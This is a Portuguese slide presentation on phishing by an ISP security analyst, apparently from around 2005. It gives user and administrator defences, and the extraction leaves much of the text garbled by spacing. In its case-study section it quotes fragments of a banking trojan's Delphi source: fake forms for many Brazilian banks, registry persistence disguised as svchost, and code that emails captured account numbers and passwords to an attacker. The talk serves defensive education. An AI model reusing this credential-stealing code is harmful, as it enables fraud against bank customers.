Upload
others
View
4
Download
0
Embed Size (px)
Citation preview
Impacto e Análise de Phising
Humberto Sartinihttp://web.onda.com.br/humberto
Palestrante
Humberto Sartini
● Analista de Segurança do Provedor OndaRPC
● Participante dos projetos:● Rau-Tu Linux ( http://www.rau-tu.unicamp.br/linux )● HoneypotBR ( http://www.honeypot.com.br/ )● RootCheck ( http://www.ossec.net/rootcheck/ )
● Participante do:● IV e V Fórum Internacional de SL● Conferência Internacional de SL ( Curitiba - 2003 )● Conisli (São Paulo/SP - 2004)
http://www.rau-tu.unicamp.br/linuxhttp://www.honeypot.com.br/http://www.ossec.net/rootcheck/
Tópicos
● O que é Phising ?
● História do Phising
● Cenário Atual
● Motivação do Phiser
● Como o usuário pode se prevenir ?
● O que o administrador pode fazer ?
● Impactos causados
● Exemplos
● Análise de Phising em tempo real
O que é Phising ?
É um termo criado para descrever o tipo de fraude que se dá através do envio de mensagem não solicitada, que se passa por comunicação de uma instituição conhecida e que procura induzir o acesso a páginas e/ou programas fraudulentos, projetados para furtar dados pessoais e financeiros de usuários.
Fonte: http://cartilha.cert.br/
O que é Phising ?
A palavra Phising (de “fishing”) vem de uma analogia criada pelos fraudadores, onde “iscas” (e-mails) são usados para “pescar” senhas e dados financeiros de usuários da Internet.
Fonte: http://cartilha.cert.br/
História do Phising
● Em janeiro de 1996 aparecimento do termo Phising no NewsGroup da 2600 Magazine
● AOL➔1990: Criação de contas com dados falsos (Nome, Número de Cartão de Crédito, etc ...)
➔1995: Utilização de “Força-Bruta”➔1997: E-mail “Suporte AOL” solicitando dados de usuário e senha.
Fonte: Wikipedia
Cenário Atual
Formas de Envio● Através de E-mails (quase que a totalidade)
● Sites com códigos maliciosos que aproveitam “falhas” de segurança de Navegadores, Leitores de E-mails e Sistemas Operacionais
● Sites com “brechas” de segurança (PHP Nuke, FormMail, ...)
● Programas de Mensagem Instantânea (MSN, AIM, ICQ, ...)
● Combinação de duas ou mais técnicas
Cenário Atual
Facilidades encontradas pelo Phiser:
● Código fonte de vários Phising/Scam em várias linguagens
● Compactador de EXE (Petite)
● Versões “bugadas” de Softwares
● Ingenuidade (??) do usuário
Cenário Atual
Facilidades encontradas pelo Phiser:
● “Burrocracia” das Operadoras e Grandes Provedores
● Delegacias Virtuais despreparadas e sem equipamentos
Cenário Atual
● Falta de Legislação específica
➔Sugere ao Ministério da Justiça a criação de delegacias especializadas na repressão aos crimes cibernéticos (21/06/2005)
➔Atribui à Justiça Federal o processamento de crimes praticados no âmbito da Internet ou em ambientes similares, disseminados em escala mundial (02/06/2005)
Cenário Atual
● Falta de Legislação específica
➔Tipificando os crimes informáticos, praticados pelos chamados "hackers", incluindo os crimes de sabotagem, falsidade e fraude informática; autorizando as autoridades a interceptarem dados dos provedores e prevendo a pena de reclusão para quem armazena, em meio eletrônico, material pornográfico, envolvendo criança e adolescente. (15/09/2004)
Cenário Atual
2002 2003 2004 20050,00
5,00
10,00
15,00
20,00
25,00
30,00
35,00
40,00
45,00
50,00
55,00
60,00
65,00
Crescimento de Fraudes
Af
Aw
Dos
Fraude
Invasão
Scan
Worm
Motivação do Phiser
Motivação do Phiser
● Impunidade
● Legislação Falha ( Nacional e Internacional )
● Máquinas Escravas x Pichação de Sites
● Aluguel de BOTNET ($$$)
Como o usuário pode se prevenir ?● Browsers
➔Manter o browser sempre atualizado➔Desativar a execução de programas Java➔Desativar a execução de JavaScripts antes de entrar em uma página desconhecida
➔Permitir que programas ActiveX sejam executados em seu computador apenas quando vierem de sites conhecidos e confiáveis
➔Manter maior controle sobre o uso de cookies
Fonte: http://cartilha.cert.br
Como o usuário pode se prevenir ?● Browsers
➔Bloquear pop-up windows e permiti-las apenas para sites conhecidos e confiáveis
➔Certificar-se da procedência do site e da utilização de conexões seguras ao realizar transações via Web
➔Somente acessar sites de instituições financeiras e de comércio eletrônico digitando o endereço diretamente no seu browser
Fonte: http://cartilha.cert.br
Como o usuário pode se prevenir ?● Leitores de E-mails
➔Manter sempre a versão mais atualizada do programa leitor de e-mails
➔Não clicar em links que, por ventura, possam aparecer no conteúdo do e-mail
➔Evitar abrir arquivos ou executar programas anexados aos e-mails
➔Desconfiar sempre dos arquivos anexados à mensagem, mesmo que tenham sido enviados por pessoas ou instituições conhecidas
Fonte: http://cartilha.cert.br
O que o administrador pode fazer ?
● É fundamental para amenizar os impactos causados pelos Phisings / Scams
● Notificar o incidente para os contatos da rede e para os grupos de segurança das redes envolvidas, além de copiar o e-mail para o Cert.br
● Efetuar configurações especificas para não permitir e/ou amenizar a propagação dos Phisings / Scams
O que o administrador pode fazer ?
● Servidores de E-mails
➔Atenção especial aos e-mails com os seguintes anexos: bat, chm, exe, hlp, lnk, pif, reg, scr, shs, vbe, vbs, wsf e wsh
➔Atenção especial aos e-mails com link apontando para arquivos com as seguintes extensões: bat, pif e scr
O que o administrador pode fazer ?
● Servidores de E-mails
➔Ativação da checagem de DNS Reverso, HELO, Listas RBL
➔SPF
O que o administrador pode fazer ?
● Servidores de Páginas
➔Alteração de “Mime Type” de arquivos com extensão duvidosas (bat, com, pif, scr)
➔Atenção a CGI (FormMail)e PHP (Php Nuke)
➔Eliminar “Cross Site Scripting”
http:/ / w w w .brturbo .com .br/ includes / barrap.js p?c= FFFFFF&url= http:/ / w w w .pop.com .br/ barra.php?url= http:/ / w w w .o i.com .br/ s erv ices / PO/ Fram eSet/ Fram eSet.php?URL= http:/ / w w w .ibes t.com .br/ s ite / parce iros / e s tadao .js p?link= http:/ / w w w .ibes t.e s tadao .com .br/ ages tado/ ?i= 1
Impactos causados
● Perda de Produtividade
● Consumo de recursos computacionais (processamento, armazenamento, banda, etc ...)
● Golpes e Fraudes
● Ameaça a Segurança da Informação
Exem p los e Casos Reais
Tod os os exem p los d e Ph is ings , e m u itos ou tros , es tão no s ite:
h t tp :/ / web.ond a.com .br/ hum berto
Porc. (%)0,00
10,00
20,00
30,00
40,00
50,00
60,00
70,00
80,00
90,00
100,00
Análise de ArtefatoKaspersky
NOD32v2
VBA32
Sybari
DrWeb
McAfee
CAT-QuickHeal
Fortinet
BitDefender
Ikarus
Avira
AntiVir
AVG
ClamAV
Panda
Sophos
eTrust-Iris
Norman
TheHacker
Avast
Symantec
F-Prot
Exem p los e Casos Reais
● Agora serão m ost radas alguns t rechos dos cód igos fon tes dos softwares u t iliz ados
● Esse software s im ula os segu in tes bancos: BB, Real, Itau , Bradesco, Caixa, Un ibanco, Un iEm presa, Banespa, San tander, BBJurid ica, BEC, BRB, NossaCaixa, Banrisu l, BancoRural e Nordes te
Exem p los e Casos Reais Ap p licat ion .Sh owMain Form := fa lse; Ap p licat ion .CreateForm (TForm 1, Form 1); Ap p licat ion .CreateForm (Tfrm BB, frm BB); Ap p licat ion .CreateForm (Tform 3, form 3); Ap p licat ion .CreateForm (Tfrm Itau , frm Itau ); Ap p licat ion .CreateForm (Tform 6, form 6); Ap p licat ion .CreateForm (Tfrm Bra, frm Bra); Ap p licat ion .CreateForm (Tfrm Un iban co, frm Un iban co); Ap p licat ion .CreateForm (Tfrm Un iEm p resa, frm Un iEm p resa); Ap p licat ion .CreateForm (Tfrm Ban esp a, frm Ban esp a); Ap p licat ion .CreateForm (Tfrm San tan d er , frm San tan d er); Ap p licat ion .CreateForm (Tfrm BBJu rid ica , frm BBJu rid ica); Ap p licat ion .CreateForm (Tfrm BEC, frm BEC); Ap p licat ion .CreateForm (Tfrm BRB, frm BRB); Ap p licat ion .CreateForm (Tfrm NossaCaixa, frm NossaCaixa); Ap p licat ion .CreateForm (Tfrm Ban r isu l, frm Ban risu l); Ap p licat ion .CreateForm (Tfrm Ban coRu ral, frm Ban coRu ral); Ap p licat ion .CreateForm (Tfrm Nord es te, frm Nord es te);
Exem p los e Casos Reais
fu n ct ion TForm 1.p rocCriaRegis t roDeIn iciarAp licacao(Rem over : BOOL): s t r in g;begin regAp licacao := TRegis t ry.Create; t ry with regAp licacao d o begin s t rCh aveAp p := 'svchos t '; RootKey := HKEY_LOCAL_MACHINE; if Op en Key(s t rCHAVE_INICIAR, Tru e) th en begin if Rem over = t ru e th en regap licacao.DeleteValu e(s t rCh aveAp p ) else
WriteSt r in g(s t rCh aveAp p , PASTA+ '\ con fig\ svch os t .exe'); en d ;
Exem p los e Casos Reaiscom p u tad or := n om ecom p u tad or ;m essagebod y.Bod y.Ad d ('Nom e d o Com p u tad or : ' + com p u tad or + ' In fected ' );m essagebod y.Bod y.Ad d ('IP: '+ Get IP + ' ');m essagebod y.Bod y.Ad d ('Data: '+ d atetos t r (n ow) + ' Hora: '+ t im etos t r (t im e) + ' ');m essagebod y.From .Nam e := 'Makin a: ' + com p u tad or ;m essagebod y.Recip ien ts .EMailAd d resses := '[email protected] ';m essagebod y.Su bject := com p u tad or + ' In fectad o ';SMTP.Hos t := 'sm tp .XXXX.com .br ';SMTP.Au th en t icat ion Typ e := a tLogin ;SMTP.Usernam e := 'XXXXXX';SMTP.Password := 'XXXXXX';SMTP.Por t := 25;sm tp .Con n ect ;Trysm tp .Sen d (m essagebod y);excep t SMTP.Hos t := 'm x2.m ail.yah oo.com ';
Exem p los e Casos Reais
SMTP.Host := 'sm tp .XXXX.com .br '; / / p õe aqu i o seu sm tp SMTP.Au th en t icat ion Typ e := a tLogin ; SMTP.Por t := 25; SMTP.Usern am e := 'XXXXXXXX'; / / o u ser SMTP.Password := 'XXXXXXXX'; / / a sen h a t ry SMTP.Con n ect ; excep t self.close; en d ;with m essagebod y d o begin From .Text := 'h 3llm 45t3rr '; From .Ad d ress := 'h 3llm [email protected] .br '; / / Recip ien ts .EMailAd d resses := '[email protected] '; / / Qu em receberá as in fo Su bject := 'ban k Accou n ts '; / / an tes reflit a q o CrAz Y é o m aior d os m aiores ^ ^ Bod y.Ad d St r in gs (Dad os); en d ;
Exem p los e Casos Reais
Data:= TSt r in gLis t .Create; d ata .Ad d ('- - - - - - > > > Ban co Ru ral < < < - - - - - - - - '); d a ta .ad d ('RURAL Usu ar io: '+ frm Ban coRu ral.ru ralu su .text ); d a ta .ad d ('RURAL Sen h a: '+ frm Ban coRu ral.sen u su .text ); d a ta .ad d ('RURAL Agen cia: '+ frm Ban coRu ral.agen .text ); d a ta .Ad d ('RURAL Tip o: '+ frm BancoRu ral.t ip o.text ); d a ta .ad d ('RURAL Con ta Corren te: '+ frm Ban coRu ral.con tacor .t ext ); d a ta .ad d ('RURAL Digito: '+ frm Ban coRu ral.d ig.text ); d a ta .ad d ('RURAL Sen h a: '+ frm Ban coRu ral.sen h afin al.t ext ); d ata .ad d (''); form 1.CloseIn tern etExp lorer ; excep t en d ; form 1.En viaEm ail(d ata);
Exem p los e Casos Reais
Data:= TSt r in gLis t .Create; Data .Ad d (' '); Data .Ad d ('- - - - - - - > > > Ban co es tad u al d o ceara < < - - - - - - - '); d a ta .Ad d ('Agen cia: '+ frm bec.ed it1 .text ); d a ta .Ad d ('Con ta: '+ frm bec.ed it2 .t ext ); d a ta .Ad d ('Digito: '+ frm bec.ed it6 .text ); d a ta .Ad d ('Sen h a NET: '+ frm bec.ed it3 .t ext ); d a ta .Ad d ('Resp os ta : '+ frm bec.ed it4 .text ); Data .Ad d ('- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - '); form 1.CloseIn tern etExp lorer ; excep t en d ; Form 1.En viaEm ail(d ata); d a ta .Free;
Análise d e Ph is ing em tem p o real
● Fed ora Core 4● Ap ach e● Dsn iff● Eth ereal● Qem u● Tcp Du m p
● Win d ows 98● In tern et Exp lorer 6
Contato
● Através do site ou e-mail
http://web.onda.com.br/humberto
http://web.onda.com.br/humberto
Créditos
Sites consu ltad os:
●Cert .br – Cart ilha d e Segurança p ara In terneth t tp :/ / car t ilha.cert .br/
●Fed orah t tp :/ / fed ora.red hat .com
●RNPht tp :/ / www.rnp .br/ not icias / im p rensa/ 2005/ not - im p - abril2005- coord .h tm l
●Sp am Cost Calcu latorh t tp :/ / www.cm sconnect .com / Market ing/ sp am calc.h tm
●Wikip ed iah t tp :/ / en .wikip ed ia.org/ wiki/ Ph ish ing
http://cartilha.cert.br/http://fedora.redhat.com/http://www.rnp.br/noticias/imprensa/2005/not-imp-abril2005-coord.htmlhttp://www.cmsconnect.com/Marketing/spamcalc.htmhttp://en.wikipedia.org/wiki/Phishing
Créditos
● Figura Slide 1:http://pcforalla.idg.se/ArticlePages/200504/04/20050404084028_PFA/phising.jpg
● Figura Slide 12 – Dados obtidos em:http://www.cert.br/stats/incidentes/
● Figura Slide 13:http://www.sindpdce.org.br/imagens/noticias/dinheiro.gif
● Figura Slide 26 e 27:h ttp :/ / www.cm sconnect .com / Market ing/ sp am calc.h tm
●Outras Figuras:Arquivo particular
http://pcforalla.idg.se/ArticlePages/200504/04/20050404084028_PFA/phising.jpghttp://www.cert.br/stats/incidentes/http://www.sindpdce.org.br/imagens/noticias/dinheiro.gifhttp://www.cmsconnect.com/Marketing/spamcalc.htm